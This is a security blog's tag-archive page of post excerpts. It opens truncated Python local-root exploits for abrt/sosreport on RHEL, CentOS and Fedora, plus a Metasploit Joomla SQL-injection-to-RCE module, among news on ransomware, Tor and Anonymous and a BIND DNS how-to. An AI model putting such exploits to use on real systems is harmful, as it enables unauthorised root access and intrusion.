Tags archives: security

 

 

0

RHEL 7.0 / 7.1 abrt / sosreport Local Root

#!/usr/bin/python # CVE-2015-5287 (?) # abrt/sosreport RHEL 7.0/7.1 local root # rebel 09/2015   # [user@localhost ~]$ python sosreport-rhel7.py # crashing pid 19143 # waiting for dump directory # dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143 # waiting for sosreport directory # sosreport: sosreport-localhost.localdomain-20151130194114 # waiting for tmpfiles # tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ'] # moving directory # moving tmpfiles # [...]

 

0

CentOS 7.1 / Fedora 22 abrt Local Root

#!/usr/bin/python # CVE-2015-5273 + CVE-2015-5287 # CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too) # abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo insecure temp directory usage # rebel 09/2015 # ----------------------------------------   # [user@localhost ~]$ id # uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 # [user@localhost ~]$ cat /etc/redhat-release # CentOS Linux release 7.1.1503 (Core) [...]

 

0

[Linux server] How to update DNS entries from DHCP to BIND9

After talking about this topic with a friend during last week, I decided to start running a local DNS server in my home network. The goals of the server are: first, have my own local domain and, second, use it as DNS cache. In this ways I can recall my local servers/devices using their assigned […]

 

0

Joomla Content History SQL Injection Remote Code Execution

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper   def initialize(info={}) super(update_info(info, 'Name' => "Joomla Content History SQLi Remote Code Execution", 'Description' => %q{ This module exploits a SQL injection vulnerability found in Joomla versions [...]

 

0

Anonymous ‘declares war’ on Islamic State

Anonymous is promising its "biggest operation ever" against Islamic State militants (IS). The hacking group's "declared war" against the extremists after the attacks in Paris on Friday. In a YouTube video, a spokesman wearing the group's signature mask said they would use their knowledge to "unite humanity". Speaking French he warned IS members to "expect [...]

 

 

0

Why the attack on Tor matters

On Wednesday, Motherboard posted a court document filed in a prosecution against a Silk Road 2.0 user indicating that the user had been de-anonymized on the Tor network thanks to research conducted by a "university-based research institute." As Motherboard pointed out, the timing of this research lines up with an active attack on the Tor [...]

 

0

More ransomware shenanigans

Recently, an update of the infamous CryptoWall ransomware (or cryptoware) was released - you can read more about that particular ransomwere here: CryptoWall 4.0 released with new Features such as Encrypted File Names Additionally, another ransomware variant has made a return, read more about that one here: “Offline” Ransomware Encrypts Your Data without C&C Communication [...]

 

0

Linux Crypto Ransomware Issue Hits 40,000 Sites

RUSSIAN ANTIVIRUS OUTFIT Dr Web has carried on studying the Linux.Encoder.1 trojan threat and reported some more bad news about increased infection. The firm revealed the problem already, but now it has more information. While before we spoke of infected parties that ran into the tens, now, we have a lot more zeroes to deal [...]